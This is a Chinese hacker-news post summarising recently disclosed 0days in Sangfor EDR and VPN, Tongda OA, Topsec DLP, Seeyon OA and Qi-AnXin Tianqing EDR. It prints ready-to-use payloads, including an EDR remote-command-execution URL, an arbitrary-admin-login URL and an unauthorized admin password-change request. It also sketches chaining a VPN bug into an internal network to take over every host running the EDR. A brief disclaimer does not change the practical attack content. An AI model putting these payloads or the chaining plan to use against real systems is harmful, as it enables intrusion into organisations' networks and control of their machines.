近期公开0day及漏洞汇总

近期公开0day及漏洞汇总

黑客资讯访客1970-01-01 8:00:003422A+A-

近期由于**暴露出很多0day及新的漏洞,下面对获取到的一些信息进行了汇总...

请勿使用以下漏洞进行非法活动及未授权测试!!

一、深信服EDR设备RCE:

Payload:https://ip/tool/log/c.php?strip_slashes=system&host=id

1597990969.jpg!small

1597990986.png!small

二、深信服EDR设备任意用户登录登录:

Payload:https://ip/ui/login.php?user=admin

通过更改user参数的值即可实现任意用户登录

1597991018.png!small

1597991023.png!small

三、通达OA-v11.6 Getshell:

复现该漏洞会删除auth.inc.php,可能会导致应用的正常使用请勿进行未授权测试

1597991037.png!small

后台回复‘通达oa’可获取利用代码

四、天融信dlp-未授权+越权:

漏洞细节:管理员登录系统系统之后修改密码,未采用原密码校验,且存在未授权访问导致存在越权修改管理员密码。

默认用户superman的uid=1

POST  /?module-auth_user&action=mod_edit.pwd HTTP/1.1

五、致远OA-A8-V5最新版:GETshell-某大佬暂未公开

六、奇安信天擎EDR设备RCE:漏洞详情暂未知

影响范围:使用奇安信天擎EDR产品的主机

可以利用深信服vpn漏洞进入内网,然后利用此漏洞控制所有装有edr的机器

七、深信服vpn RCE:漏洞详情暂未知

最后:

近期蓝队应该关注的漏洞:

1597991055.jpg!small

点击这里复制本文地址 以上内容由黑资讯整理呈现,请务必在转载分享时注明本文地址!如对内容有疑问,请联系我们,谢谢!
  • 2条评论
  • 囤梦笙沉2022-06-02 05:06:07
  • ps://ip/tool/log/c.php?strip_slashes=system&host=id二、深信服EDR设备任意用户登录登录:Payload:https
  • 柔侣矫纵2022-06-02 03:04:36
  • 5最新版:GETshell-某大佬暂未公开六、奇安信天擎EDR设备RCE:漏洞详情暂未知影响范围:使用奇安信天擎EDR产品的主机可以利用深信服vpn漏洞进入内网,然后利用此漏洞控制所有

支持Ctrl+Enter提交

黑资讯 © All Rights Reserved.  
Copyright Copyright 2015-2020 黑资讯
滇ICP备19002590号-1
Powered by 黑客资讯 Themes by 如有不合适之处联系我们
网站地图| 发展历程| 留言建议| 网站管理